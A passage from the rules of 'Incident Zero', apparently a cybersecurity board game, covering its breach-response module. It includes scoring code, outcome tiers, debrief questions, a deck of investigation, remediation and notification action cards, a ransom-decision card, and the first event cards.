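    score += trust_modifier(sum(s.trust_meters.values()) / len(s.trust_meters))
    # Step 3: decision & event modifiers, each at most once
    if s.customers_notified_by_turn5:
        score += 5
    score += min(3 * s.quality_investigations, 6)
    score += {"NONE": 0, "NEGOTIATE": -5, "PAY": -15, "REFUSE": 0}[s.ransom]
    if s.ransom == "REFUSE" and s.data_published:
        score -= 20
    score -= 10 * len({"EVENT-05", "EVENT-06", "EVENT-08"} & set(s.events_fired))
    if not s.customers_notified:
        score -= 15
    if not s.regulators_notified:
        score -= 20
    # Step 4: clamp to 0-100
    return max(0, min(100, score))


def outcome_tier(rep: int) -> str:
    """Outcome tier from the Final Reputation table."""
    if rep >= 85:
        return "Exemplary"
    if rep >= 70:
        return "Managed"
    if rep >= 55:
        return "Damaged"
    if rep >= 40:
        return "Mismanaged"
    return "Catastrophic"


def worked_example() -> int:
    """The module-rules example: Inv 25 / Rem 35 / Comm 45, trust average 54,
    NEGOTIATE, customers notified by Turn 5, regulators notified, no quality
    investigation (ACTION-02 only) and no -10 events."""
    meters = {"Customers": 50, "Regulators": 60, "Executives": 55,
              "Board": 55, "Media": 50}          # constructed values, average 54
    return final_reputation(ScoreInputs(
        investigation=25, remediation=35, communication=45,
        trust_meters=meters, customers_notified_by_turn5=True,
        customers_notified=True, regulators_notified=True, ransom="NEGOTIATE"))
```

Tracing the example by hand: each track is in the 25-49% band (-5 each, -15 total), the 54% trust average falls in the 50-69% band (0), transparent customer notification by Turn 5 gives +5, NEGOTIATE gives -5, and both notifications were made, so 100 - 15 + 5 - 5 = 85, the bottom of the Exemplary tier.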
| Final Reputation | Outcome | Interpretation |
|---|---|---|
| 85-100 | Exemplary | Crisis well-managed; stakeholder trust preserved; the organization recovers |
| 70-84 | Managed | Adequate response; some damage; recovery likely |
| 55-69 | Damaged | Poor response; significant customer loss; regulatory scrutiny; recovery uncertain |
| 40-54 | Mismanaged | Major reputational/financial damage; leadership changes likely |
| Below 40 | Catastrophic | Company survival in question; CEO likely replaced |
Loss precedence: (1) any stakeholder trust at 0% at any point = immediate loss; (2) otherwise, the tier table above. Below-20% trust is a critical warning state only.
PART 1: INVESTIGATION QUALITY (2 min)
1. "Did you investigate adequately? What's the total impact?"
2. "What important information did you miss?"
3. "Would better forensics have changed your decisions?"

PART 2: COMMUNICATION STRATEGY (2 min)
1. "How did you prioritize stakeholder notifications?"
2. "What would you communicate differently?"
3. "Did transparency help or hurt your reputation?"

PART 3: FINANCIAL DECISIONS (2 min)
1. "Did you pay the ransom? Why or why not?"
2. "What was your total incident cost (Budget spent × $50K, plus deferred penalties)?"
3. "Would different decisions have saved money?"

PART 4: RESPONSE QUALITY (2 min)
1. "If you replayed, what would you do first?"
2. "Which stakeholder relationship was hardest to preserve?"
3. "What was your biggest crisis decision?"

PART 5: REAL-WORLD CONNECTION (2 min)
1. "Compare your spending to actual breaches (Target, Equifax, etc.)"
2. "What's harder: prevention or response?"
3. "Why is it so expensive to manage a real breach?"
Small Breach (Beginner) — 50,000 records, opportunistic attacker, no subpoena (skip EVENT-12), total real-world loss ~$1-5M (narrative).
Medium Breach (Intermediate) — 500,000 records, ransom-seeking criminal group, full event timeline, total loss ~$5-50M (narrative).
Large Breach (Advanced) — 5M+ records, sophisticated attacker, use the scope variant (start computation at 80), total loss ~$50M+ (narrative).
Small Breach scenario:
- Scope: 50,000 customer passwords exposed.
- Attacker: opportunistic; ransom demand small — try REFUSE and manage the fallout.
- Budget: 50.
- Focus: communicating bad news without panic.
- Lesson: even small breaches require careful stakeholder management.

Medium Breach scenario:
- Scope: 500,000 records via a compromised vendor.
- Budget: 50 (+ any carried over from prior modules).
- Focus: ACTION-04 Third-Party IR shines here; multi-stakeholder communication.
- Lesson: vendor relationships complicate crisis response.

Large Breach scenario:
- Scope: 5M+ records; attacker won't negotiate (ACTION-13 offers REFUSE only). Use the scope variant (start at 80).
- Focus: damage control; accept a "Damaged" tier as a good result.
- Lesson: some breaches are unwinnable; response quality still matters.
If you scored 70+ (Managed or better):
- Continue to Audit & Compliance Module → validate response procedures post-breach
- Transition to Hardening Module → prevent similar breaches

If you scored below 70:
- Discuss what went wrong
- Replay the scenario with different decisions
- Study real breach case studies (Target, Equifax, SolarWinds)

Standalone: play again with a different breach type or attacker profile
cards/disaster-recovery/Disaster Recovery Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/core-deck/crisis-action-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Crisis Action Cards represent the specific actions an organization can take during a breach to investigate, remediate, and respond. Teams deploy ONE Crisis Action each turn to advance three objectives: Investigation %, Remediation %, and Communication % (each tracked 0-100%). Track advances are deterministic — no dice are required to advance a track.
Money mapping: 1 Budget ≈ $50K. Dollar figures on cards (fines, ransom) use this mapping unless marked narrative-only.
Crisis Actions are organized into three categories, plus one decision card:
- Investigation Actions (4 cards): enable faster containment
- Remediation Actions (4 cards): rebuild infrastructure
- Communication Actions (4 cards): maintain customer trust
- Crisis Decision (1 card)
Some actions list Duration N (N greater than 1). The rule, defined once:
Duration N: the action occupies your action slot only on the turn it is started; its track advance completes and is applied at the start of the Nth following turn. Only one multi-turn action may be in flight at a time. While it is in flight, you may take single-turn actions on later turns, but you may not start another multi-turn action.
Example: ACTION-01 (Duration 2) started on Turn 2 applies its +25% Investigation at the start of Turn 4.
The signature d20 stays as an optional bonus only (it never gates track advancement): when a team plays an Action card with a strong, specific technical justification, the Threat Orchestrator may allow a d20 roll. On 11+, that action's track advance gains +5%. One roll per action card played.
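The Multi-Turn Actions rule and the optional justification bonus, as an added example of a small turn engine (not code from the Incident Zero project). Card ids, costs, advances and durations are copied from the Crisis Action table; `Card`, `TurnEngine` and `demo` are names chosen here. Assumptions: a single-turn card (Duration 1) applies its advance when played, a Duration N card applies it at the start of turn T+N, only one action card may be played per turn, and the +5% bonus for an 11+ justification roll is applied to the card's first listed track.

```python
"""Turn engine for the Multi-Turn Actions rule (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Card:
    id: str
    cost: int
    advances: tuple   # ((track, percent), ...); the first entry is the primary track
    duration: int = 1


# Costs and advances copied from the Crisis Action table; HOLDING is the free standing rule.
CARDS = {
    "ACTION-01": Card("ACTION-01", 12, (("Inv", 25),), 2),
    "ACTION-02": Card("ACTION-02", 8, (("Inv", 15),)),
    "ACTION-03": Card("ACTION-03", 5, (("Inv", 10),)),
    "ACTION-04": Card("ACTION-04", 20, (("Inv", 30), ("Rem", 20)), 3),
    "ACTION-05": Card("ACTION-05", 10, (("Rem", 20),)),
    "ACTION-06": Card("ACTION-06", 8, (("Rem", 15),)),
    "ACTION-07": Card("ACTION-07", 15, (("Rem", 25),), 2),
    "ACTION-08": Card("ACTION-08", 6, (("Rem", 12),)),
    "ACTION-09": Card("ACTION-09", 10, (("Comm", 20),)),
    "ACTION-10": Card("ACTION-10", 8, (("Comm", 10),)),
    "ACTION-11": Card("ACTION-11", 12, (("Comm", 15),)),
    "ACTION-12": Card("ACTION-12", 9, (("Comm", 12),)),
    "HOLDING": Card("HOLDING", 0, (("Comm", 5),)),
}


class TurnEngine:
    def __init__(self, budget: int = 50):
        self.budget = budget
        self.turn = 1
        self.tracks = {"Inv": 0, "Rem": 0, "Comm": 0}
        self.pending = []          # (apply_on_turn, card_id, bonus)
        self.in_flight = None      # id of the one multi-turn action in flight
        self.slot_used = False     # ONE action card per turn

    def _apply(self, card: Card, bonus: int) -> None:
        for i, (track, pct) in enumerate(card.advances):
            extra = bonus if i == 0 else 0          # bonus on the primary track (assumption)
            self.tracks[track] = min(100, self.tracks[track] + pct + extra)

    def play(self, card_id: str, justification_roll: int = 0) -> None:
        """Blue Team's turn: pay the cost and apply or schedule the advance."""
        card = CARDS[card_id]
        if self.slot_used:
            raise ValueError("only one action card per turn")
        if card.cost > self.budget:                 # budget floor: Budget never goes below 0
            raise ValueError(f"cannot afford {card_id} with {self.budget} Budget")
        if card.duration > 1 and self.in_flight is not None:
            raise ValueError(f"{self.in_flight} is still in flight")
        self.budget -= card.cost
        self.slot_used = True
        bonus = 5 if justification_roll >= 11 else 0   # optional d20: +5% on 11+
        if card.duration == 1:
            self._apply(card, bonus)                # single-turn: advance applies now
        else:
            self.in_flight = card_id                # Duration N: lands at start of T+N
            self.pending.append((self.turn + card.duration, card_id, bonus))

    def end_turn(self) -> None:
        """Advance the counter, then START OF TURN: complete any action due now."""
        self.turn += 1
        self.slot_used = False
        for entry in [p for p in self.pending if p[0] == self.turn]:
            _, card_id, bonus = entry
            self._apply(CARDS[card_id], bonus)
            self.pending.remove(entry)
            if self.in_flight == card_id:
                self.in_flight = None


def demo() -> dict:
    """The rule's own example: ACTION-01 (Duration 2) started on Turn 2 lands on Turn 4."""
    eng = TurnEngine(budget=50)
    eng.play("ACTION-03")                 # Turn 1: +10% Inv immediately, Budget 45
    eng.end_turn()
    eng.play("ACTION-01")                 # Turn 2: scheduled for the start of Turn 4, Budget 33
    eng.end_turn()
    inv_on_turn3 = eng.tracks["Inv"]      # still 10: ACTION-01 has not landed yet
    try:
        eng.play("ACTION-07")             # a second multi-turn action is not allowed
        rejected = False
    except ValueError:
        rejected = True
    eng.play("ACTION-06", justification_roll=14)   # single-turn card is fine; bonus applies
    eng.end_turn()                        # start of Turn 4: ACTION-01's +25% Inv lands
    return {"inv_turn3": inv_on_turn3, "inv_turn4": eng.tracks["Inv"],
            "rem_turn4": eng.tracks["Rem"], "budget": eng.budget,
            "turn": eng.turn, "second_multiturn_rejected": rejected}
```

Running `demo()` shows the two points a Threat Orchestrator most often has to adjudicate: the Investigation track stays at 10% on Turn 3 even though ACTION-01 was paid for on Turn 2, and a second multi-turn card (ACTION-07) is refused while ACTION-01 is in flight, whereas a single-turn card is accepted.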
This is a standing rule, not a numbered card. On any turn, instead of playing an Action card, the team may issue a Holding Statement (internal update / brief public status statement):
ACTION-01 Forensic Analysis
- Category: Investigation
- Cost: 12 Budget
- Investigation Advance: +25%
- Duration: 2 turns (multi-turn action)

Description: Forensic experts analyze compromised systems to determine:
- What data was accessed
- What was exfiltrated
- How long attacker had access
- What attack techniques were used
- Evidence for legal proceedings

Key Details:
- Requires shutting down compromised system (removes it from operation)
- Requires forensics team (may need external consultants)
- Takes time (2 turns minimum)
- Provides detailed evidence
- Essential for legal action and regulatory compliance

When to Use:
- Need definitive answer about breach scope
- Legal action is likely
- Compliance investigation required
- Regulatory agency involved

Risk if Not Done:
- Cannot determine full extent of damage
- Cannot properly remediate (may miss persistence)
- No evidence for law enforcement
- Regulatory penalties for inadequate investigation

Regulatory Impact:
- Most breach notification laws require "reasonable investigation"
- Forensics evidence may be required for regulatory compliance
- Better investigation = stronger regulatory defense

Team Trade-off:
- Expensive (12 Budget)
- Takes time (2 turns)
- But provides high investigation %
- Provides evidence for future action
ACTION-02 Threat Hunting
- Category: Investigation
- Cost: 8 Budget
- Investigation Advance: +15%
- Duration: 1 turn

Description: Security team proactively searches logs and systems for:
- Other compromised systems
- Lateral movement indicators
- Persistence mechanisms
- Command & Control communication
- Evidence of data staging

Key Details:
- Requires SIEM with good logging (if available)
- Team searches for attack indicators
- Can discover secondary compromises
- Lower cost than forensics but less detailed
- Faster than forensics (1 turn)

When to Use:
- Need to know if compromise spread
- Want to find hidden persistence
- Time is critical (forensics takes 2 turns)
- Budget is constrained

Risk if Not Done:
- May not discover all compromised systems
- Attacker may maintain hidden access
- May lose evidence over time (logs rotate)
- Compliance investigation may be incomplete

Regulatory Impact:
- Shows good faith investigation effort
- Supports "reasonable investigation" standard
- Evidence of proactive security posture

Team Trade-off:
- Cheaper than forensics (8 Budget)
- Faster (1 turn vs. 2)
- Less detailed evidence
- Good balance of cost/time/effectiveness
ACTION-03 Log Analysis
- Category: Investigation
- Cost: 5 Budget
- Investigation Advance: +10%
- Duration: 1 turn

Description: Security team reviews available logs (firewall, VPN, Windows Event Log, application logs) to understand:
- When breach was discovered
- What access was gained
- What systems were accessed
- What data might have been accessed
- Timeline of attack

Key Details:
- Requires logs (must have been collecting logs)
- Basic analysis of existing logs
- Cheapest investigation action
- Quick (1 turn)
- Limited by log retention/quality
- Can be done internally (no external consultants)

When to Use:
- Budget is extremely tight
- Need quick preliminary understanding
- Good logging infrastructure in place
- Time is critical

Risk if Not Done:
- No understanding of what happened
- Cannot determine scope or impact
- Regulatory agencies upset about lack of investigation
- Potential for incomplete response

Regulatory Impact:
- Minimal investigation (may not satisfy "reasonable investigation")
- Shows attempt at investigation
- Not sufficient as sole investigation method

Team Trade-off:
- Cheapest investigation (5 Budget)
- Fastest (1 turn)
- Limited effectiveness
- Often insufficient alone
ACTION-04 Third-Party IR
- Category: Investigation (+ Remediation)
- Cost: 20 Budget
- Investigation Advance: +30% (+ Remediation +20%)
- Duration: 3 turns (ongoing engagement)

Description: Bring in external incident response firm (forensics, incident handling, remediation specialists). They conduct:
- Comprehensive forensic investigation
- Breach scope determination
- Remediation recommendations
- Expert testimony for legal proceedings
- Regulatory coordination

Key Details:
- Very expensive (20 Budget)
- Takes significant time to mobilize
- Provides expert guidance and credibility
- Provides evidence acceptable in court
- Supports regulatory defense
- Multi-turn (Duration 3): occupies your action slot only on the turn started; see Multi-Turn Actions rule

When to Use:
- Major breach with legal implications
- Need expert investigation for court
- Regulatory agency demands expertise
- Internal team cannot handle scope
- Liability is significant

Benefits:
- Expert investigation (higher quality)
- Evidence for prosecution
- Regulatory/legal credibility
- Expert testimony available
- Ongoing support (3 turns)

Risk if Not Done:
- Without external expertise, breach response may be insufficient
- Legal case may fail (poor evidence)
- Regulatory penalties for inadequate investigation
- May miss critical evidence

Regulatory Impact:
- High credibility with regulators
- Better legal defense
- Shows serious investigation effort
- External experts satisfy "reasonable investigation"

Team Trade-off:
- Most expensive (20 Budget)
- Long commitment (Duration 3 — advances apply at the start of the 3rd following turn)
- But provides significant investigation + remediation
- Provides external expertise and credibility
- While in flight you may take single-turn actions, but no other multi-turn action (v2.2 Multi-Turn rule)
ACTION-05 Patch & Harden
- Category: Remediation
- Cost: 10 Budget
- Remediation Advance: +20%
- Duration: 1 turn

Description: Apply patches to the vulnerability that was exploited:
- Install OS patches (if vulnerability is OS-level)
- Update application (if vulnerability is app-level)
- Change default credentials
- Remove backdoor accounts
- Harden network configuration

Key Details:
- Targets the specific vulnerability that was exploited
- Must know what vulnerability was exploited (requires investigation)
- Can be done on specific systems or organization-wide
- Prevents same attack from succeeding again
- Does NOT remove attacker if already inside

When to Use:
- Know what vulnerability was exploited
- Want to prevent re-exploitation
- Can apply patch without affecting business
- Quick remediation needed

Risk if Not Done:
- Attacker can re-exploit same vulnerability
- Breach scope may grow
- Regulatory agency upset about lack of remediation
- Risk of breach happening again

Regulatory Impact:
- Shows timely remediation
- Prevents recurrence
- Good compliance posture
- Regulatory agencies expect patching

Team Trade-off:
- Moderate cost (10 Budget)
- Quick (1 turn)
- Fixes vulnerability
- But only prevents re-exploitation, doesn't remove attacker
ACTION-06 Containment
- Category: Remediation
- Cost: 8 Budget
- Remediation Advance: +15%
- Duration: 1 turn

Description: Remove compromised systems from network to:
- Stop attacker from using compromised system for lateral movement
- Prevent attacker from exfiltrating more data
- Preserve compromised system for forensics
- Limit blast radius of compromise

Key Details:
- Disconnect compromised system from network (kill network)
- System is still available for forensics
- Stops active attacker in that system
- Does NOT affect attacker if they're in other systems
- May impact business (systems are unavailable)

When to Use:
- Know which systems are compromised
- Want to stop active attacker
- Can tolerate system downtime
- Attacker is still actively in system

Risk if Not Done:
- Attacker continues using compromised system
- Lateral movement continues
- More data exfiltration
- Attacker may install additional backdoors

Regulatory Impact:
- Shows swift containment action
- Demonstrates incident response
- Limits liability (stopped attacker)
- Good compliance posture

Team Trade-off:
- Moderate cost (8 Budget)
- Quick (1 turn)
- Stops active attacker
- But impacts business operations
ACTION-07 Rebuild from Backup
- Category: Remediation
- Cost: 15 Budget
- Remediation Advance: +25%
- Duration: 2 turns (restore + verification)

Description: Rebuild compromised systems from backup:
- Restore system from clean backup (pre-compromise)
- Apply patches to prevent re-exploitation
- Restore only clean data
- Verify system is clean before returning to production
- Monitor restored system for attacker re-entry

Key Details:
- Requires backup of system (must exist and be clean)
- Takes time to restore (2 turns minimum)
- Removes all attacker artifacts
- Ensures system is truly clean
- Most reliable remediation method
- Dependent on backup quality/testing

When to Use:
- Backup exists and is verified clean
- System compromise is extensive
- Want to ensure complete attacker removal
- Business can tolerate 2-turn rebuild

Risk if Not Done:
- Attacker may maintain persistence (if system not rebuilt)
- Restore from backup with attacker in it = no improvement
- Compliance may require clean rebuild

Regulatory Impact:
- Shows complete remediation
- Demonstrates thorough approach
- Better regulatory outcome
- Shows commitment to clean recovery

Team Trade-off:
- Higher cost (15 Budget)
- Takes time (2 turns)
- But provides complete remediation
- Most reliable method
ACTION-08 Credential Reset
- Category: Remediation
- Cost: 6 Budget
- Remediation Advance: +12%
- Duration: 1 turn

Description: Revoke and reset all potentially compromised credentials:
- Reset passwords for all accounts that touched compromised system
- Revoke tokens/API keys
- Reset VPN credentials
- Update database passwords
- Revoke certificates/SSH keys

Key Details:
- Prevents attacker from using stolen credentials
- Must do if credentials were compromised (stolen by Mimikatz, etc.)
- Can cause business disruption (users locked out)
- Quick and important
- Often overlooked but critical

When to Use:
- Credentials were likely compromised
- Attacker had access to credential stores
- Need to prevent attacker re-entry via stolen credentials
- Quick credential reset is possible

Risk if Not Done:
- Attacker can use stolen credentials to re-enter
- Lateral movement using stolen creds continues
- Breach is not truly contained
- Regulatory violation (allowing unauthorized access)

Regulatory Impact:
- Essential remediation step
- Shows understanding of attack chain
- Prevents credential reuse attacks
- Regulatory expectation

Team Trade-off:
- Low cost (6 Budget)
- Quick (1 turn)
- Important and often overlooked
- Can cause short-term business disruption
ACTION-09 Customer Notification
- Category: Communication
- Cost: 10 Budget
- Communication Advance: +20%
- Duration: 1 turn (but affects later turns)
- Deadline (v2.2): Recommended by end of Turn 5. If not completed by then: Customer trust -10 at the start of each later turn; if never completed in-game: -15 Reputation at final scoring (deferred statutory violation).

Description: Notify customers that their data may have been breached:
- Determine which customers were affected
- Prepare notification message
- Send via email, mail, or phone
- Provide information about what was accessed
- Offer credit monitoring/identity protection if applicable
- Field customer questions/complaints

Key Details:
- Required by breach notification laws ("without unreasonable delay" in California and most U.S. states; GDPR requires notifying individuals without undue delay when risk is high)
- Can be very expensive if many customers affected
- Notification can cause loss of customer trust
- Early notification shows good faith
- Delayed notification shows company doesn't care
- Impacts Customers stakeholder directly

Regulatory Requirements:
- Most laws require notification "without unreasonable delay"; some states set specific outer limits
- California: notify without unreasonable delay; CCPA statutory damages fuel class actions
- Notification must include:
  - What information was accessed
  - Recommended actions
  - Contact information
  - Free credit monitoring (sometimes)

When to Use:
- Customer data was accessed in breach
- Regulatory requirement to notify
- Want to rebuild customer trust
- Transparency is important

Risk if Not Done:
- Regulatory violation (fines, penalties)
- Customer discovery + lawsuits
- Loss of customer trust (worse than notification)
- Reputation damage from cover-up worse than from breach

Regulatory Impact:
- Many states REQUIRE customer notification
- California law, GDPR, and other state laws all require notification; CCPA statutory damages fuel class actions
- Without notification = regulatory violation + fines
- Proactive notification = better regulatory relationship

Team Trade-off:
- Moderate cost (10 Budget)
- Can be done quickly (1 turn)
- Required by law (usually)
- Impacts Customers stakeholder (see Stakeholder Cards)
- Must be done eventually
ACTION-10 Regulatory Notification
- Category: Communication
- Cost: 8 Budget
- Communication Advance: +10%
- Duration: 1 turn (but ongoing for months)
- Deadline (v2.2): Must be completed by end of Turn 8 (the GDPR 72-hour anchor). Escalating penalty from Turn 6: if not yet completed, Regulator trust -10 at the start of Turns 6, 7, and 8. If never completed in-game: -20 Reputation at final scoring (deferred fine).

Description: Notify appropriate regulatory agencies:
- Contact FBI/Secret Service (federal crimes)
- Contact state attorney general (breach notification)
- Contact relevant sector regulator (HHS for healthcare, OCC for banking, etc.)
- Contact DHS (if critical infrastructure)
- Coordinate with law enforcement

Key Details:
- Required by law in many cases (healthcare, financial, etc.)
- May trigger investigation by law enforcement
- Can help recover stolen data
- Provides some legal protection
- Can delay prosecution (if they're investigating)
- Required before public disclosure in some cases

Regulatory Requirements:
- EU data (GDPR): Must notify the supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER (narrative-only figure)
- Healthcare (HIPAA): Must report to HHS Office for Civil Rights
- Financial (GLBA/FFIEC): Must report to banking regulators
- Payment cards (PCI-DSS): Must report to card networks
- Critical infrastructure: Must report to DHS/CISA

When to Use:
- Data breach triggers regulatory requirement
- Want law enforcement assistance
- Want to establish good faith investigation
- Legal team recommends it

Risk if Not Done:
- Regulatory violation if required
- Law enforcement cannot assist
- Company appears to be hiding breach
- Regulators may impose penalties

Regulatory Impact:
- Required in many cases (legal obligation)
- Shows cooperation with authorities
- May help recover stolen data
- Better regulatory relationship
- May reduce penalties (self-reporting)

Team Trade-off:
- Moderate cost (8 Budget)
- Ongoing (involves multiple turns of coordination)
- Required by law (usually)
- Impacts Regulators stakeholder (see Stakeholder Cards)
- Must be done in most cases
ACTION-11 Media Management
- Category: Communication
- Cost: 12 Budget
- Communication Advance: +15%
- Duration: 1 turn (but ongoing for days/weeks)

Description: Manage media coverage and public perception:
- Prepare press statement
- Contact media proactively
- Manage social media response
- Coordinate CEO/executive messaging
- Defend company reputation
- Provide accurate information to media

Key Details:
- Can heavily influence public perception
- Proactive messaging better than reactive
- Media coverage can amplify damage
- Poor communication = reputation disaster
- Good communication = company "handled it well"
- PR firm may be needed (crisis PR)

When to Use:
- Breach is significant (likely to attract media)
- Company has public reputation risk
- Customers are media-aware (B2C more than B2B)
- Proactive messaging is possible

Risk if Not Done:
- Media covers story with only attacker's perspective
- Reputation damage from poor response
- Stock price may drop (if public company)
- "No comment" looks like company is hiding
- Social media amplifies negative coverage

Impact if Done Well:
- "Company handled breach responsibly"
- Trust is maintained or recovered
- Stock price less impacted
- Reputation damage is contained
- Customer retention better

Team Trade-off:
- Higher cost (12 Budget)
- Ongoing (multiple turns)
- Impacts Media/Board stakeholder (see Stakeholder Cards)
- Critical for public companies
- Can significantly affect perception
ACTION-12 Board Communication
- Category: Communication
- Cost: 9 Budget
- Communication Advance: +12%
- Duration: 1 turn (but triggers Board Meeting - see Event Cards)

Description: Inform board of directors and shareholders about breach:
- Prepare incident briefing for board
- Present forensics findings
- Discuss regulatory/legal implications
- Present remediation plan and costs
- Discuss risk mitigation going forward
- Field board questions

Key Details:
- Board must be informed promptly
- Disclosure may be required (SEC rules if public company)
- Board has fiduciary duty to inform shareholders
- Lawsuit risk if board hides information
- Board can fire CEO if response is poor
- Must include implications for D&O insurance

Regulatory Requirements:
- SEC disclosure rules (if public company)
- State corporate law (fiduciary duty)
- Insurance requirements (D&O coverage)

When to Use:
- Board needs to understand breach
- Public company (SEC disclosure likely needed)
- Board questions will come (better to be prepared)
- Shareholder lawsuits are likely

Risk if Not Done:
- Board discovers breach from media = crisis of confidence
- Shareholder lawsuits for non-disclosure
- SEC investigation for disclosure violations
- CEO may be fired (looked like hiding information)
- Stock price crashes when discovered

Impact if Done Well:
- Board is informed and supportive
- No surprise when disclosed
- Board can defend company (if sued)
- Stock market takes news in stride
- Organized response is possible

Team Trade-off:
- Moderate cost (9 Budget)
- Critical for public companies
- Impacts Board stakeholder (see Stakeholder Cards)
- Required by law (usually)
- Complete before EVENT-04 (Board Meeting, scheduled Turn 3) to be "prepared" (see Event Cards)
ACTION-13 Ransom Decision
- Category: Crisis Decision
- Cost: Varies by option (see below)
- Timing: Play at any time before the ransom deadline (default: start of Turn 5). Playing this card does NOT use your turn's action slot — it is a decision made in addition to your normal action. Once per game. If no decision is made by the deadline, the team is treated as having chosen REFUSE.
- Used only in scenarios with a ransom/extortion demand.

Choose exactly ONE option:

Option A — PAY
- Cost: 20 Budget (≈ $1M at 1 Budget ≈ $50K)
- Reputation: -15 at final scoring
- Effect: The data-publication event is skipped/cancelled. +20% Remediation immediately (decryption keys restore systems).
- No guarantee: The Threat Orchestrator rolls a d20. On 1-5, the keys don't work — no refund, and the Remediation advance is +0% instead of +20%. (The publication event stays cancelled; the attacker took the money and moved on.)
- Flavor: "Criminals are not a customer-service organization."

Option B — NEGOTIATE
- Cost: 5 Budget (negotiator/counsel fees)
- Reputation: -5 at final scoring
- Effect: The data-publication event is delayed by 2 turns (default: from start of Turn 5 to start of Turn 7). Buys time to notify stakeholders and remediate before publication.

Option C — REFUSE
- Cost: 0 Budget
- Reputation: No immediate change. If the data-publication event triggers later: -20 Reputation at final scoring.
- Effect: No payment, no delay. Focus budget on investigation, remediation, and communication.

Data-Publication Event (reference): In ransom scenarios, if the team has not PAID by the ransom deadline (default: start of Turn 5; +2 turns if NEGOTIATE), the attacker publishes stolen data: Customer trust -20, Media trust -15 (and the REFUSE scoring penalty above, if applicable).

Legal & practical facts (corrected v2.2):
- Payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage
- Law enforcement (FBI) discourages payment — it funds and incentivizes future attacks
- Payment does not guarantee data deletion or working keys

Educational Purpose: There is no "right" answer — payment is a genuine trade-off between operational recovery, ethics, legality, and reputation.
| Card | Category | Cost | Advance | Duration | Key Benefit |
|---|---|---|---|---|---|
| ACTION-01 | Investigation | 12 | +25% | 2 turns | Expert forensics |
| ACTION-02 | Investigation | 8 | +15% | 1 turn | Find hidden compromises |
| ACTION-03 | Investigation | 5 | +10% | 1 turn | Quick log analysis |
| ACTION-04 | Investigation | 20 | +30% Inv / +20% Rem | 3 turns | Third-party expertise |
| ACTION-05 | Remediation | 10 | +20% | 1 turn | Fix vulnerability |
| ACTION-06 | Remediation | 8 | +15% | 1 turn | Contain attacker |
| ACTION-07 | Remediation | 15 | +25% | 2 turns | Clean rebuild |
| ACTION-08 | Remediation | 6 | +12% | 1 turn | Revoke access |
| ACTION-09 | Communication | 10 | +20% | 1 turn | Notify customers (by Turn 5) |
| ACTION-10 | Communication | 8 | +10% | 1 turn | Notify regulators (by Turn 8) |
| ACTION-11 | Communication | 12 | +15% | 1 turn | Media management |
| ACTION-12 | Communication | 9 | +12% | 1 turn | Board notification (before Turn 3) |
| ACTION-13 | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant | Ransom decision (once per game) |
| Free | Communication | 0 | +5% | 1 turn | Holding Statement (standing rule, not a card) |
Budget floor (v2.2): Budget can never go below 0. If you cannot afford any card, the free Holding Statement is always available.
Teams must balance three objectives (each goes 0-100%):
- Investigation %: Understand scope and impact
- Remediation %: Fix vulnerability and remove attacker
- Communication %: Manage stakeholders and public perception

Investigation-Heavy Strategy:
- Spend early turns investigating (ACTION-01, ACTION-02, ACTION-04)
- Then remediate with full knowledge
- Advantage: Know exactly what happened
- Disadvantage: Takes time, attacker may still be active

Remediation-Heavy Strategy:
- Contain and clean immediately (ACTION-06, ACTION-07, ACTION-08)
- Investigate after containment
- Advantage: Stop attacker quickly
- Disadvantage: May miss something, incomplete cleanup

Balanced Strategy:
- Do some investigation + some remediation each turn
- Use cheaper actions (ACTION-03, ACTION-06, ACTION-08)
- Save expensive actions for critical moments
- Advantage: Steady progress on all three objectives

Early Communication:
- Notify stakeholders early (ACTION-09, ACTION-10, ACTION-12)
- Show proactive response
- Maintain trust and credibility

Late Communication:
- Wait until full picture is known
- Risk: Stakeholders discover from media
- Risk: Looks like hiding information

Selective Communication:
- Notify regulators (required by law)
- Delay customer notification (if allowed)
- Focus on internal response first
With 50 Budget, the mandatory crisis beats are always affordable:
Cheapest mandatory path: 5 + 8 + 10 + 6 = 29 Budget. A stronger balanced path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44 Budget — still within 50.
Disaster Recovery Module: Crisis Action Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/core-deck/event-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Event Cards represent external events that occur during the crisis—some predictable deadlines, some escalations triggered by the team's situation. Events create time pressure and complicate the response.
Money mapping: 1 Budget ≈ $50K. Dollar figures are narrative unless converted to Budget on the card.
The game lasts 8 turns. Each turn is one crisis phase of roughly 6-12 hours of narrative time:
| Turn | Narrative Time | Anchor |
|---|---|---|
| 1 | Detection +6h | Internal discovery |
| 2 | +12h | Legal/executive escalation complete |
| 3 | +18h | Board meets |
| 4 | +24h | Day 1 ends |
| 5 | +36h | Customer notification recommended deadline; default ransom deadline |
| 6 | +48h | Regulatory escalation begins |
| 7 | +60h | Legal/government pressure peaks |
| 8 | +72h | GDPR 72-hour regulatory notification deadline — game ends |
All deadlines in this module use this clock. There are no other timers.
At setup:
1. Place the 6 Scheduled events face-down on the timeline at their printed turns.
2. Place the 6 Triggered events face-up in a reference row where everyone can read their trigger conditions.

Each turn (start of turn):
1. Reveal and resolve any Scheduled event placed on this turn.
2. Check every un-fired Triggered event's condition; resolve any whose condition is now met.
3. Each event fires once per game.
Trust changes from events clamp to 0-100%. Budget changes clamp to a floor of 0.
EVENT-01 First Media Coverage
Scheduled: Turn 2
Type: Discovery

Description: A news outlet publishes a story about the breach:
- "Company Suffers Data Breach" headline
- Unnamed source gives details
- Story spreads on social media
- Phone starts ringing with reporter calls

Resolution:
- If ACTION-11 (Media Management) was completed before this turn: Media trust +5 (proactive framing works)
- Otherwise: Media trust -10 (the story runs without your side)

Duration: Ongoing narrative (media coverage continues)
EVENT-04 Board Meeting
Scheduled: Turn 3
Type: Governance

Description: The board of directors holds an emergency meeting to review breach scope, investigation progress, remediation plan, budget, and executive performance.

Resolution:
- If ACTION-12 (Board Communication) was completed before this turn: Board trust +10 (prepared briefing)
- Otherwise: Board trust -20 (the board learns details from the news, not from you)

Team Preparation:
- Should have forensics/investigation underway
- Should have preliminary findings
